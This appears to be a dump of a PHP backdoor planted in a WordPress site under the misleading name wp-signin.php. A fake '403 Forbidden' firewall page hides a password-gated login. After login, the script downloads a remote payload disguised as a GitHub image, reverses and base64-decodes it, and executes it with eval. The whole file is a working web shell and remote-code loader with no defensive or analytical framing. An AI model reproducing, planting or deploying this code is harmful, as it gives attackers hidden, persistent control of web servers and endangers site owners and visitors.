%PDF- %PDF-
| Direktori : /var/www/drt.com.mx/ |
| Current File : //var/www/drt.com.mx/wp-signin.php |
<?php
session_start();
$password = "76fdd00d9db694259b003d95f9dd66cc";
function login_shell()
{
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>404</title>
</head>
<body>
<div class=""
<center><h1>403 Forbidden</h1></center>
<hr />
<p>You can't access it, because your files are hit by a firewall</p>
</div>
</form>
</body>
</html>
<footer>
<form class="login-container" action="" method="post">
<div align="center">
<input type="Password" name="pass" placeholder=" Password"> <input type="submit" name="submit" value="LOGIN">
<html>
<body>
</body>
</html>
</footer>
<style>
body {
background: #fff;
font-family: 'Times new roman';
text-align: center;
}
.login {
width: 400px;
margin: 16px auto;
font-size: 16px;
}
/* Reset top and bottom margins from certain elements */
.login-header,
.login p {
margin-top: 0;
margin-bottom: 0;
}
.login-header {
background: #790000;
padding: 20px;
font-size: 1.4em;
font-weight: normal;
text-align: center;
text-transform: uppercase;
color: #fff;
border: 2px solid #ffca2d;
}
/* Every row inside .login-container is defined with p tags */
.login p {
padding: 12px;
}
.login input {
box-sizing: border-box;
display: block;
width: 100%;
border-width: 1px;
border-style: solid;
padding: 16px;
outline: 0;
font-family: inherit;
font-size: 0.95em;
}
.login input[type="email"],
.login input[type="password"] {
background: #e9e9e9;
border-color: #bbb;
color: #555;
}
/* Text fields' focus effect */
.login input[type="email"]:focus,
.login input[type="password"]:focus {
border-color: #888;
}
.login input[type="submit"] {
background: #790000;
border-color: transparent;
color: #fff;
cursor: pointer;
border: 2px solid #ffca2d;
border-radius: 5px 5px;
}
.login input[type="submit"]:hover {
background: #17c;
}
/* Buttons' focus effect */
.login input[type="submit"]:focus {
border-color: #05a;
}
</style>
<?php
exit;
}
if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
if (isset($_POST['pass']) && (md5($_POST['pass']) == $password)) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
login_shell();
}
}
?>
</style>
<html>
<?php
$l = "https://user-images.githubusercontent.com/105673502/236584953-2a52fb35-6cd9-437b-8af5-44b8842f540f.jpg"/* "" - ni*/;
if( function_exists('curl_init') ) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $l);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36");
$body = curl_exec($ch);
curl_close($ch);
}
else {
$body = @file_get_contents($l);
}
eval(base64_decode(strrev($body)));
?>